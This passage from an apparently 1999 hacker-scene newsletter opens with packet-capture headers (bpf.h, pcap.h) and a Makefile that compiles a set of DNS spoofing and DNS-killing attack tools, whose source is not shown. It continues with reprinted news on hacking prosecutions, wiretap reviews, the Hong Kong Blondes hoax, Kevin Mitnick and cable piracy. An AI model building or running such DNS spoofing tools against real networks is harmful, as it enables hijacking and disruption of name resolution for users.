Struct return by BIOCVERSION. This represents the version number of * the filter language described by the instruction encodings below. * bpf understands a program iff kernel_major == filter_major && * kernel_minor >= filter_minor, that is, if the value returned by the * running kernel has the same major number and a minor number equal * equal to or less than the filter being downloaded. Otherwise, the * results are undefined, meaning an error may be returned or packets * may be accepted haphazardly. * It has nothing to do with the source code version. */ struct bpf_version { u_short bv_major; u_short bv_minor; }; /* Current version number of filter architecture. */ #define BPF_MAJOR_VERSION 1 #define BPF_MINOR_VERSION 1 /* * BPF ioctls * * The first set is for compatibility with Sun's pcc style * header files. If your using gcc, we assume that you * have run fixincludes so the latter set should work. */ #if (defined(sun) || defined(ibm032)) && !defined(__GNUC__) #define BIOCGBLEN _IOR(B,102, u_int) #define BIOCSBLEN _IOWR(B,102, u_int) #define BIOCSETF _IOW(B,103, struct bpf_program) #define BIOCFLUSH _IO(B,104) #define BIOCPROMISC _IO(B,105) #define BIOCGDLT _IOR(B,106, u_int) #define BIOCGETIF _IOR(B,107, struct ifreq) #define BIOCSETIF _IOW(B,108, struct ifreq) #define BIOCSRTIMEOUT _IOW(B,109, struct timeval) #define BIOCGRTIMEOUT _IOR(B,110, struct timeval) #define BIOCGSTATS _IOR(B,111, struct bpf_stat) #define BIOCIMMEDIATE _IOW(B,112, u_int) #define BIOCVERSION _IOR(B,113, struct bpf_version) #define BIOCSTCPF _IOW(B,114, struct bpf_program) #define BIOCSUDPF _IOW(B,115, struct bpf_program) #else #define BIOCGBLEN _IOR('B',102, u_int) #define BIOCSBLEN _IOWR('B',102, u_int) #define BIOCSETF _IOW('B',103, struct bpf_program) #define BIOCFLUSH _IO('B',104) #define BIOCPROMISC _IO('B',105) #define BIOCGDLT _IOR('B',106, u_int) #define BIOCGETIF _IOR('B',107, struct ifreq) #define BIOCSETIF _IOW('B',108, struct ifreq) #define BIOCSRTIMEOUT _IOW('B',109, struct timeval) #define BIOCGRTIMEOUT _IOR('B',110, struct timeval) #define BIOCGSTATS _IOR('B',111, struct bpf_stat) #define BIOCIMMEDIATE _IOW('B',112, u_int) #define BIOCVERSION _IOR('B',113, struct bpf_version) #define BIOCSTCPF _IOW('B',114, struct bpf_program) #define BIOCSUDPF _IOW('B',115, struct bpf_program) #endif /* * Structure prepended to each packet. */ struct bpf_hdr { struct timeval bh_tstamp; /* time stamp */ bpf_u_int32 bh_caplen; /* length of captured portion */ bpf_u_int32 bh_datalen; /* original length of packet */ u_short bh_hdrlen; /* length of bpf header (this struct plus alignment padding) */ }; /* * Because the structure above is not a multiple of 4 bytes, some compilers * will insist on inserting padding; hence, sizeof(struct bpf_hdr) won't work. * Only the kernel needs to know about it; applications use bh_hdrlen. */ #ifdef KERNEL #define SIZEOF_BPF_HDR 18 #endif /* * Data-link level type codes. */ #define DLT_NULL 0 /* no link-layer encapsulation */ #define DLT_EN10MB 1 /* Ethernet (10Mb) */ #define DLT_EN3MB 2 /* Experimental Ethernet (3Mb) */ #define DLT_AX25 3 /* Amateur Radio AX.25 */ #define DLT_PRONET 4 /* Proteon ProNET Token Ring */ #define DLT_CHAOS 5 /* Chaos */ #define DLT_IEEE802 6 /* IEEE 802 Networks */ #define DLT_ARCNET 7 /* ARCNET */ #define DLT_SLIP 8 /* Serial Line IP */ #define DLT_PPP 9 /* Point-to-point Protocol */ #define DLT_FDDI 10 /* FDDI */ #define DLT_ATM_RFC1483 11 /* LLC/SNAP encapsulated atm */ #define DLT_RAW 12 /* raw IP */ #define DLT_SLIP_BSDOS 13 /* BSD/OS Serial Line IP */ #define DLT_PPP_BSDOS 14 /* BSD/OS Point-to-point Protocol */ /* * The instruction encondings. */ /* instruction classes */ #define BPF_CLASS(code) ((code) & 0x07) #define BPF_LD 0x00 #define BPF_LDX 0x01 #define BPF_ST 0x02 #define BPF_STX 0x03 #define BPF_ALU 0x04 #define BPF_JMP 0x05 #define BPF_RET 0x06 #define BPF_MISC 0x07 /* ld/ldx fields */ #define BPF_SIZE(code) ((code) & 0x18) #define BPF_W 0x00 #define BPF_H 0x08 #define BPF_B 0x10 #define BPF_MODE(code) ((code) & 0xe0) #define BPF_IMM 0x00 #define BPF_ABS 0x20 #define BPF_IND 0x40 #define BPF_MEM 0x60 #define BPF_LEN 0x80 #define BPF_MSH 0xa0 /* alu/jmp fields */ #define BPF_OP(code) ((code) & 0xf0) #define BPF_ADD 0x00 #define BPF_SUB 0x10 #define BPF_MUL 0x20 #define BPF_DIV 0x30 #define BPF_OR 0x40 #define BPF_AND 0x50 #define BPF_LSH 0x60 #define BPF_RSH 0x70 #define BPF_NEG 0x80 #define BPF_JA 0x00 #define BPF_JEQ 0x10 #define BPF_JGT 0x20 #define BPF_JGE 0x30 #define BPF_JSET 0x40 #define BPF_SRC(code) ((code) & 0x08) #define BPF_K 0x00 #define BPF_X 0x08 /* ret - BPF_K and BPF_X also apply */ #define BPF_RVAL(code) ((code) & 0x18) #define BPF_A 0x10 /* misc */ #define BPF_MISCOP(code) ((code) & 0xf8) #define BPF_TAX 0x00 #define BPF_TXA 0x80 /* * The instruction data structure. */ struct bpf_insn { u_short code; u_char jt; u_char jf; bpf_int32 k; }; /* * Macros for insn array initializers. */ #define BPF_STMT(code, k) { (u_short)(code), 0, 0, k } #define BPF_JUMP(code, k, jt, jf) { (u_short)(code), jt, jf, k } #ifdef KERNEL extern u_int bpf_filter(); extern void bpfattach(); extern void bpf_tap(); extern void bpf_mtap(); #else #if __STDC__ extern u_int bpf_filter(struct bpf_insn *, u_char *, u_int, u_int); #endif #endif /* * Number of scratch memory words (for BPF_LD|BPF_MEM and BPF_ST). */ #define BPF_MEMWORDS 16 #endif ----[ END of bpf.h ]---- ---[pcap.h ]--- /* * Copyright (c) 1993, 1994, 1995, 1996, 1997 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the Computer Systems * Engineering Group at Lawrence Berkeley Laboratory. * 4. Neither the name of the University nor of the Laboratory may be used * to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#) $Header: pcap.h,v 1.21 97/10/15 21:59:13 leres Exp $ (LBL) */ #ifndef lib_pcap_h #define lib_pcap_h #include #include #include #include #define PCAP_VERSION_MAJOR 2 #define PCAP_VERSION_MINOR 4 #define PCAP_ERRBUF_SIZE 256 /* * Compatibility for systems that have a bpf.h that * predates the bpf typedefs for 64-bit support. */ #if BPF_RELEASE - 0 < 199406 typedef int bpf_int32; typedef u_int bpf_u_int32; #endif typedef struct pcap pcap_t; typedef struct pcap_dumper pcap_dumper_t; /* * The first record in the file contains saved values for some * of the flags used in the printout phases of tcpdump. * Many fields here are 32 bit ints so compilers won't insert unwanted * padding; these files need to be interchangeable across architectures. */ struct pcap_file_header { bpf_u_int32 magic; u_short version_major; u_short version_minor; bpf_int32 thiszone; /* gmt to local correction */ bpf_u_int32 sigfigs; /* accuracy of timestamps */ bpf_u_int32 snaplen; /* max length saved portion of each pkt */ bpf_u_int32 linktype; /* data link type (DLT_*) */ }; /* * Each packet in the dump file is prepended with this generic header. * This gets around the problem of different headers for different * packet interfaces. */ struct pcap_pkthdr { struct timeval ts; /* time stamp */ bpf_u_int32 caplen; /* length of portion present */ bpf_u_int32 len; /* length this packet (off wire) */ }; /* * As returned by the pcap_stats() */ struct pcap_stat { u_int ps_recv; /* number of packets received */ u_int ps_drop; /* number of packets dropped */ u_int ps_ifdrop; /* drops by interface XXX not yet supported */ }; typedef void (*pcap_handler)(u_char *, const struct pcap_pkthdr *, const u_char *); char *pcap_lookupdev(char *); int pcap_lookupnet(char *, bpf_u_int32 *, bpf_u_int32 *, char *); pcap_t *pcap_open_live(char *, int, int, int, char *); pcap_t *pcap_open_offline(const char *, char *); void pcap_close(pcap_t *); int pcap_loop(pcap_t *, int, pcap_handler, u_char *); int pcap_dispatch(pcap_t *, int, pcap_handler, u_char *); const u_char* pcap_next(pcap_t *, struct pcap_pkthdr *); int pcap_stats(pcap_t *, struct pcap_stat *); int pcap_setfilter(pcap_t *, struct bpf_program *); void pcap_perror(pcap_t *, char *); char *pcap_strerror(int); char *pcap_geterr(pcap_t *); int pcap_compile(pcap_t *, struct bpf_program *, char *, int, bpf_u_int32); /* XXX */ int pcap_freecode(pcap_t *, struct bpf_program *); int pcap_datalink(pcap_t *); int pcap_snapshot(pcap_t *); int pcap_is_swapped(pcap_t *); int pcap_major_version(pcap_t *); int pcap_minor_version(pcap_t *); /* XXX */ FILE *pcap_file(pcap_t *); int pcap_fileno(pcap_t *); pcap_dumper_t *pcap_dump_open(pcap_t *, const char *); void pcap_dump_close(pcap_dumper_t *); void pcap_dump(u_char *, const struct pcap_pkthdr *, const u_char *); /* XXX this guy lives in the bpf tree */ u_int bpf_filter(struct bpf_insn *, u_char *, u_int, u_int); char *bpf_image(struct bpf_insn *, int); #endif ----[ END of pcap.h ]---- ----[Makefile]---- # Version 0.2 SHELL = /bin/sh # Uncomment this if you're not on Linux #LIBS = -lsocket -lnsl -lpcap CC = gcc RM = /bin/rm BIN = . #BIN = w00w00/bins LIBS = -lpcap CFLAGS = -I. -L. all: WSDkillDNS WSDspoofID WSDsniffID WSD-baddns WSD-IDpred WSDkillDNS: WSDkillDNS.c $(CC) $(CFLAGS) WSDkillDNS.c $(LIBS) -o $(BIN)/WSDkillDNS WSDspoofID: WSDspoofID.c $(CC) $(CFLAGS) WSDspoofID.c $(LIBS) -o $(BIN)/WSDspoofID WSDsniffID: WSDsniffID.c $(CC) $(CFLAGS) WSDsniffID.c $(LIBS) -o $(BIN)/WSDsniffID WSD-baddns: WSD-baddns.c $(CC) $(CFLAGS) WSD-baddns.c $(LIBS) -o $(BIN)/WSD-baddns WSD-IDpred: WSD-IDpred.c $(CC) $(CFLAGS) WSD-IDpred.c $(LIBS) -o $(BIN)/WSD-IDpred ----[END of Makefile ]---- @HWA 34.0 2 Swedish men charged with hacking U.S computers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.usatoday.com/life/cyber/tech/ctf865.htm 2 charged for hacking U.S. computers STOCKHOLM, Sweden (AP) -- Two Swedish men were charged Monday with hacking into the computer systems of NASA and the U.S. military. Prosecutors said the intent apparently was not to steal anything, though NASA reportedly spent a lot of money to make sure it didn't happen again. State prosecutor Yngve Rydberg called the crimes ''digital graffiti.'' Trial was set for sometime this fall. Rydberg said he expected the two suburban Stockholm men would be fined, but not jailed. Charlie Malm and Joel Soederberg, both 24, were charged with violating Sweden's computer laws and buying stolen equipment. Malm works at a kindergarten, Rydberg for an Internet company. Contacted by The Associated Press, Soederberg declined to comment. Malm did not return a phone call placed to his home. The NASA break-in allegedly occurred between October and December 1996. Soederberg was detained for two weeks in early 1997. Malm has never been detained, Rydberg said. ''They didn't reach the holiest parts of the systems,'' he said, adding they failed in an attempt to infect NASA's computer system with a virus. The two also allegedly hacked into the computer systems of the U.S. Air Force, Army and Marines, and the British Internet company Wide Intellectual Resources, according to the charges. NASA intends to demonstrate in the trial that Malm and Soederberg ''caused NASA great economic loss,'' court documents stated. Thomas Talleur, director of NASA's computer crime unit, said the space agency suffers a lot of intrusions. ''Anybody who provides as many open sites as we do leaves itself open to attacks,'' he said in a telephone interview, adding that the agency mostly investigates hacker intrusions when organized crime is suspected. @HWA 35.0 Feds Delay network ~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by AlienPlague The feds are delaying a joint AT&T and British telecom venture that would create a transatlantic telecom network. Apparently the feds want to make sure they have access to the network for wiretapping purposes and to protect U.S. citizens against monitoring by foreign governments. (For some reason I don't buy the protection part.) ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2315342,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- DOJ, FBI delay AT&T-BT plans By Kathy Chen and Rebecca Blumenstein, WSJ Interactive Edition August 16, 1999 2:32 PM PT URL: U.S. officials are reviewing a planned joint venture between AT&T Corp. and British Telecommunications PLC for its possible effects on law enforcement and national security, delaying approval of the trans-Atlantic telecom agreement. The Federal Bureau of Investigation and the Department of Justice's criminal division are holding talks with the companies to resolve concerns over the plan to form a $10 billion global venture, people familiar with the situation said. The review appears to be part of a larger trend of law-enforcement agencies weighing in on telecommunications deals. While the Federal Communications Commission traditionally has overseen approval of such deals, the law-enforcement agencies may want to ensure they have access to telecom networks for approved wiretapping operations, as well as that U.S. citizens are protected against monitoring by foreign governments. Growing investments by foreign companies and the introduction of new phone technologies are complicating their efforts. The result has been increased participation by the agencies in vetting telecom deals -- and delays for the companies. Down but not out While the agencies' concerns aren't likely to scuttle the AT&T-BT alliance, they are holding up its approval. FCC officials have completed their review of the venture, which was announced in July 1998, but are awaiting word from the Justice Department and FBI, which have been in talks with the firms for more than two months, according to people familiar with the situation. Both AT&T (NYSE:T) and BT declined to comment on whether they are involved in talks with law-enforcement agencies. But AT&T spokesman Jim McGann said, "We continue to believe approval of the deal is on track." The firms have said they would like to wrap up the deal by October. The Justice Department and FBI said they don't comment on specific cases. The AT&T-BT venture aims to provide international companies with voice, video and data services. The companies are combining international operations with about $10 billion in annual revenue. European regulators, which recently have begun looking at telecom deals more carefully, have approved the venture. The specific nature of the FBI and Justice Department concerns remains unclear. If several past and continuing cases offer any clue, they are likely to involve the agencies' desires to ensure continued access to telecom networks for wiretapping purposes and to protect the privacy of U.S. citizens. In one of the first cases addressed by the agencies -- BT's planned acquisition of MCI Communications announced in 1996 -- the FBI and Justice Department required the companies to set up a separate subsidiary to take over all of MCI's business with U.S. government agencies. The agencies also asked the companies to implement other security measures, such as agreeing not to store billing information outside the U.S. for a certain period of time. That information is sometimes subpoenaed by law-enforcement officials for criminal investigations, and storage in the U.S. would facilitate continued access. The deal later fell through for unrelated reasons. Law-enforcement agencies recently approved a merger between AirTouch Communications Inc. and United Kingdom-based Vodafone, now Vodafone AirTouch PLC. AirTouch spokesman Jonathan Marshall said the companies engaged in several months of negotiations with the agencies over how to address security issues and agreed to conditions aimed at guaranteeing the government's right to intercept communications over their U.S. wireless networks. @HWA 36.0 The Effects of War on the Yugoslavian Network ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Michelle While the NATO bombings may have had some detrimental effects it doesn't look like Yugoslavia was completely cut off during the war. The people at the Internet Mapping Project compiled some graphical network maps every day during the bombing. Pretty interesting to look at. (Look for the mpeg at the bottom.) The Internet Mapping Project http://www.cs.bell-labs.com/~ches/map The Effects of War on the Yugoslavian Network http://www.cs.bell-labs.com/~ches/map/yu/index.html The effects of war on the Yugoslavian Network. - Steven Branigan & Bill Cheswick Starting at the end of March, we mapped the Yugoslavian network daily. A chart of the reachability shows that the network was pretty stable until about May 3, 1999. Then, it changed drastically. Below are some single day network map snapshots for the period from May 1st until May 10. As you can see from the maps, a fair amount of the Yugoslavian network disappears and subsequently reappears on a daily basis. We also mapped Bosnia during this period. Though our traces showed no common communication routes, quite a bit of Bosnia went away at the same time. We suspect that the two countries probably share power grid connections. http://www.cs.bell-labs.com/~ches/map/yu/index.html (maps) @HWA 37.0 Survey Finds Internet Full of Holes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Using custom made software Liraz Siri, an 18 year old from Israel, probed 36 million internet hosts for 18 common vulnerabilities. 450,000 of those servers were vulnerable to attacks. While that is only 2% of the total that is way to much.(Yes, we have mentioned this before, but it is important.) Internet News http://www.internetnews.com/intl-news/article/0,1087,6_184381,00.html Interent Auditing Project Report - Via Security Focus http://www.securityfocus.com/templates/forum-latest.html?forum=2 @HWA 38.0 Hacking Into an IT Career ~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by WeldPond Looking for a career in 'hacking'? David Del Torto, director of technology for security services at Deloitte & Touche in San Francisco gave out a few tips to the attendees at the recent Chaos Computer Camp. ComputerWorld http://www.computerworld.com/home/news.nsf/all/9908124hackcareers (Online News, 08/12/99 05:34 PM) Hacking your way to an IT career By Ann Harrison ALTLANDSBERG, GERMANY -- At the first annual Chaos Communication Camp, which took place outside of Berlin last weekend (see story), hundreds of hackers and their machines filled the main hack tent exchanging information on the latest exploits and security tools. Most were young, skillful and in demand by corporate information technology departments. The camp, which attracted some of the most talented European and American hackers, was one of the largest hacker gatherings in Europe so far this year. David Del Torto, director of technology for security services at Deloitte & Touche in San Francisco, agreed. He noted that hackers like himself were working at all the top five auditing and accounting firms. Del Torto presented hacker career workshops with titles such as "Take This Job and Ping It/Hacking The Corporate Ladder For Fun & Profit." The following are some of the tips he offered hackers seeking corporate jobs: - Write your own job description. - Volunteer for a project in your area of expertise. - Network with people. - Start your own company. Or sign on to another start-up. He also advised the crowd to build tools they themselves would use ("You should be customer No. 1!"), license technology when appropriate and solve problems with free software or generate it. "When building reputation capital, it's pretty important to learn to think like the boss,'' he said. In addition to his day job, Del Torto is a member of the Cypherpunks, a San Francisco-based hacking organization that produces what he calls "no-compromise" security technology. Del Torto had advice for his Fortune 1000 brethren, too. Asked if young hackers, who may not be partial to suits and ties, are discriminated against, Del Torto recalled that Dan Farmer, author of the widely used Satan network scanning tool, was once turned down by a prospective employer who found his appearance unsettling. He urged IT managers to avoid superficial judgments and focus on the reputation of the individual. IT managers interviewing young people who "act differently" should remember when they were young, he advised. Del Torto noted that in the relatively small community of IT security professionals, people are preceded by their reputations. He said he knows programmers who are talented, but he won't hire or recommend them because they don't act responsibly. @HWA 39.0 SETI@Home, Largest Computation Ever ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Space Rogue With over 1 million users, and 50,000 years of accumulated computer time the SETI@Home project is now the largest computation ever. SETI@Home is a distributed computing project that analyzes radio signals for signs of alien life. The HNN SETI@Home Team is still going strong. BBC http://news.bbc.co.uk/hi/english/sci/tech/newsid_423000/423022.stm HNN SETI@Home Team http://setiathome.ssl.berkeley.edu/stats/team/team_2251.html Tuesday, August 17, 1999 Published at 18:11 GMT 19:11 UK Sci/Tech Alien hunter breaks record The massive Arecibo telescope is collecting the data By BBC News Online Science Editor Dr David Whitehouse The SETI@home screensaver project, which allows anyone with a desktop computer to join the search for intelligent life in space, is now the largest computation ever done, on Earth at least. Since May, over a million people have downloaded the SETI@home screensaver. But, despite an accumulated 50,000 years of computer time, no signs of alien life have yet been found. The SETI@home program has infiltrated homes, offices and classrooms in 223 countries, "It is truly a phenomenon," said SETI@home project director David Anderson. "One person runs it in an office and pretty soon the whole office is doing it." Companies large and small (including the BBC) as well as schools and universities have formed groups to compete to see whose computers can analyse the most chunks of data. The program acts like a screen saver, starting when the computer is idle and analysing data collected from the Arecibo radio telescope in Puerto Rico. The analysis is done automatically and the results are sent back to the University of California at Berkeley, while participants can see the progress on the computer screen. Number cruncher According to Professor Anderson it proves the value of distributed computing and it has encouraged him to look around for other projects that could benefit from this technique. "SETI@home is now the largest computation ever done on this planet, we have accumulated more than 50,000 years of computing time so far," said project scientist Dan Werthimer, a research physicist at the University of California Berkeley's Space Sciences Laboratory. "This also is the most sensitive sky survey ever conducted," Professor Werthimer added. SETI@home is so powerful because we are using the world's largest telescope and we are able to use it continuously, 24 hours a day, by piggybacking on other observations." Of the million people who have downloaded the software about 600,000 have completed at least one unit of data analysis. Analysts say that the backlog of data from the Arecibo telescope is rapidly disappearing, and Professor Anderson and his team are currently updating the software to analyse the data again to search for more complex signals. @HWA 40.0 Hong Kong Blondes Labeled a Fraud ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Simple.Nomad An article in Computer currents has labeled the Hong Kong Blondes as a hoax. The HKBs are a deep underground group who work to disrupt Chinese computer systems from the inside. This article claims that because he can't find any evidence to support their existence they must be fake. Maybe they are just really good at hiding. That is, after all, what it means to be underground. Last year the Cult of the Dead Cow formed a relationship with the group to help train them on encryption and intrusion techniques. Last December the cDc issued a press release claiming that their training had been successful and that their relationship would now end. Just because the reporter who wrote this article can find no evidence of their existence probably means he didn't look too hard. Computer Currents http://www.currents.net/newstoday/99/08/18/news3.html Late Update In a recent conversation with HNN Reid Fleming a cDc cultee said "An absence of evidence does not equal evidence of absence." The Hacker Hoax By Neil Taylor, IT Daily. August 18, 1999 The world's press might have been fooled into believing that a Chinese hacker group plans to bring down the country's information infrastructure. According to stories that began circulating in July last year, the rogue group, the Hong Kong Blondes, is made up of dissidents both overseas and within the Chinese Government. The rumours began when an interview with the group's leader was published by US hacking group the Cult of the Dead Cow (CDC) at http://www.cultdeadcow.com . In the interview, illusive Hong Kong Blondes director Blondie Wong said that he had formed an organization named the Yellow Pages, which would use information warfare to attack China's information infrastructure. The group threatened to attack both Chinese state organizations and Western companies investing in the country. For their part, the CDC claimed that they would train the Hong Kong Blondes in encryption and intrusion techniques. One year after the group's supposed launch, there is no evidence that the Hong Kong Blondes ever existed. In fact, all evidence appears to indicate that the Hong Kong Blondes report was a highly successful hoax. The story was first reported in Wired magazine, and during the past year has been followed up by numerous publications including USNews, the Los Angeles Times, Asiaweek and ComputerWorld. In every case, the original source was the CDC's July interview. The CDC is best known for its remote administration tool Back Orifice. BO can be installed on a Windows PC without the user's knowledge, giving full control over the machine to unauthorized third parties. The first version of Back Orifice was released a month after the Blondes story was leaked to Wired magazine. Repeated attempts to contact the CDC failed to elicit a response, and despite inquiries throughout the Hong Kong technology and security industries, not one person contacted had ever come across any evidence of the group's existence. The Hong Kong Police, which is responsible for tracking hacking activities locally, had no knowledge of the group. Detective senior inspector Martyn Purbrick, of the Commercial Crime Bureau's Computer Crime Section, said that there had been no official reports of the group's activities. He added that he only knew the group's name through reports in the media. Stephen Mak, principal assistant secretary of the information technology and broadcasting bureau, said, "We have carried out inquiries both within the government as well as with the ISPA, but we could find no information about the group." Samuel Chanson, director of the Cyberspace Centre at the Hong Kong University of Science and Technology, said the threats would take no great skill to carry out. "Hacking into almost any major server is do-able with some training." Chanson said that a group of his undergraduate students took a two-day course in intrusion techniques, after which they were able to break into several hundred servers in campus tests. "We checked how good their network security was and succeeded in bringing down a good number of their servers as well as gaining important information... Attacking the general commercial server is not a difficult task." Early this year, a US hacker group, the Legion of the Underground (LoU) at http://www.legions.org , launched a declaration of infowar on China, in response to the harsh penalties handed out for computer offenses in the country. LoU members cited the Hong Kong Blondes as an influence behind their short-lived war, which was abandoned following condemnation from other hacker groups. However, a large number of Chinese Web sites were hacked by protesters, including Hongkong.com, China Window, Wenjin Software and the semi-official China Society for Human Rights Studies. CDC remains tight-lipped on the issue. But publishers might do well to remember a statement made by the group in its Media Domination Global Update: "We intend to dominate and subvert the media wherever possible." @HWA 41.0 Peace Prize Winner Warns of Cyber War ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Lionel Jose Ramos Horta, a Nobel laureate, has warned that if fraud is detected in the August 30th balloting in the vote for East Timor's independence then cyber war will result. The Timor resistance leader has warned that a dozen viruses were being designed by over 100 people in Europe and North America to infect computers if there is fraud detected. (While these claims may be true it reeks of sensationalism and headline grabbing. With no evidence to support these claims we remain doubtful.) BBC http://news.bbc.co.uk/hi/english/world/asia-pacific/newsid_423000/423549.stm Wednesday, August 18, 1999 Published at 13:45 GMT 14:45 UK World: Asia-Pacific Timor activists warn of cyber war Gunmen shot at the offices of the main independence group on Tuesday Computer hackers plan to sabotage Indonesia's banking system if Jakarta rejects an East Timor vote for independence, resistance leader Jose Ramos Horta has warned. Mr Horta said about a dozen viruses were being designed to infect computers if there is fraud in the 30 August ballot on the territory's future. The Nobel laureate warned that a 100-strong team of hackers in Europe and North America had prepared a campaign that would cause economic devastation to Indonesia. Their targets would include computers controlling banking, finance, the military and aviation, he said in a commentary in Australia's Sydney Morning Herald. "One computer wizard recently told me, 'We will terminate their banking system. We will invade their sites and destroy them...We will cause them to lose hundreds of millions of dollars'," he added. Electoral fraud The warnings come as East Timor prepares to choose between Jakarta's offer of autonomy or full independence. The United Nations which is overseeing the ballot says it is confident there will be a free and fair vote. But Mr Horta has warned that the ballot could turn into the biggest electoral fraud in modern times. He said Indonesia's army intended to get a pro-integration vote through by terror and fraud. Mr Horta alleged that a violent campaign by pro-Jakarta militias had already cost over 1,000 lives razed entire villages uprooted 80,000 people He said the vote was also compormised by a ban on detained resistance leader Xanana Gusmao and himself during the campaigning continued Indonesian army support for the militias a biased Indonesian controlled East Timorese media "All this makes for an extremely dangerous situation. Full-scale violence before or after the ballot is now almost certain," Mr Horta added. ''The next phase of resistance will be much more desperate and ferocious and will not be contained to East Timor," he added. Mr Horta's comments came as Amnesty International also warned that Indonesia's failure to halt the bloodshed in East Timor - mainly by pro-Jakarta militias - threatened to prevent a fair ballot. Indonesia invaded East Timor, a former Portuguese colony, in 1975 and annexed it the following year in a move not recognised by the UN. Human rights groups say more than 200,000 people died, many of them from starvation, in the years since the invasion. @HWA 42.0 Mitnick Still Denied Kosher Food ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by TurTleX In continuing violation of Constitutional Law, Kevin Mitnick is still being denied the ability to practice his religion by not being served kosher foods. A rabbi for the San Bernardino County Detention Center has confirmed that the center does not provide kosher meals. Kevin has started eating the vegetarian meals provided by the prison as an alternative, even though they are not kosher. Wired http://www.wired.com/news/news/politics/story/21322.html Life Not Kosher for Mitnick by Douglas Thomas 12:15 p.m. 18.Aug.99.PDT Jailed computer hacker Kevin Mitnick wants out of his current facility because it doesn't serve kosher food. Mitnick wouldn't eat for the first two days of his stay at the San Bernardino County Detention Center after being transferred there from the Los Angeles Metropolitan Detention Center. He only recently began eating the jail's vegetarian meals, which it offers as a substitute. But those meals don't meet rabbinical standards. Mitnick insists that maintaining a kosher diet is extremely important to him. "This is a violation of my constitutional rights," Mitnick said. "I'm being forced into a situation where I have to violate my religious beliefs or starve." Complicating the move, Mitnick said, is that his MDC-stored money won't be available for several weeks, making it impossible for him to buy commissary food. In addition, he said, prices are triple what they were at the old facility. Mitnick's rabbi, Aaron Kriegal, and the rabbi for the San Bernardino County Detention Center, Hillel Cohn, confirmed that the SBCDC does not serve kosher meals to Jewish inmates. "Does it make life more difficult? Yes," Cohn said. "But being in prison is difficult. It wasn't meant to be a country club. There are some sacrifices inmates have to make." Cohn said returning Mitnick to Los Angeles would "make life easier" for Mitnick, but did not believe that the move was likely. "This is not the first request we've had to have an inmate transferred for this reason," Cohn said. At sentencing, Mitnick's attorney failed to persuade US District Judge Marianne Pfaelzer that Mitnick serve his time at the MDC to ensure his access to kosher meals. Currently, Mitnick shares one large cell with approximately 60 other inmates, each of whom is issued a small mattress, sheet, and blanket. The cell contains one toilet and one shower, each in open view of the cell. Mitnick calls the conditions "dehumanizing." Mitnick is expected to spend four to six weeks at the San Bernardino facility while awaiting final designation, most likely to Nellis Prison Camp just outside of Las Vegas. Mitnick's attorneys have filed a motion with the court requesting that he be transferred back to the MDC until the Bureau of Prisons decides where he will serve the remainder of his 46-month prison sentence. Because of previous time served, Mitnick is expected to be released in January 2000. @HWA 43.0 Cable Pirates Busted ~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by skeletor and deepquest MediaOne, the largest cable provider in Massachusetts, recently performed an audit of 162,000 non-customer homes and found that over 23,000 where receiving cable illegally. MediaOne has decided not to press charges but instead has disconnected the freeloaders. MediaOne has hired contractors to go street by street to check whether non customers are receiving cable TV service. These audits are preformed from outside the homes. Boston Globe http://www.boston.com/dailyglobe2/230/metro/many_get_cable_TV_for_free_audit_finds+.shtml A raid conducted on Wednesday by MediaOne officials and the Moreno Valley Police Department has uncovered more than a million dollars' worth of "black boxes," the descrambling device that enables users to illegally access cable-TV channels. All equipment, including shipping and billing information from Cable Converter Concepts and Hi-Tech Converter Labs was confiscated. Andover News http://www.andovernews.com/cgi-bin/news_story.pl?28463/topstories Boston Globe; THIS STORY HAS BEEN FORMATTED FOR EASY PRINTING many get cable TV for free, audit finds MediaOne pulls plug on thousands By Bruce Mohl, Globe Staff, 08/18/99 In a street-by-street survey in Eastern Massachusetts, the state's largest cable television company is finding that thousands of people are getting cable but not paying for it. Of 162,000 non-customer homes or apartments checked so far by MediaOne, 14 percent, or nearly 23,000, were receiving an unauthorized cable TV signal. In most cases, the signal was either stolen or left on inadvertently by MediaOne. MediaOne is not taking the freeloaders to court or demanding back payment. Instead, the company is disconnecting the unauthorized service and politely urging the 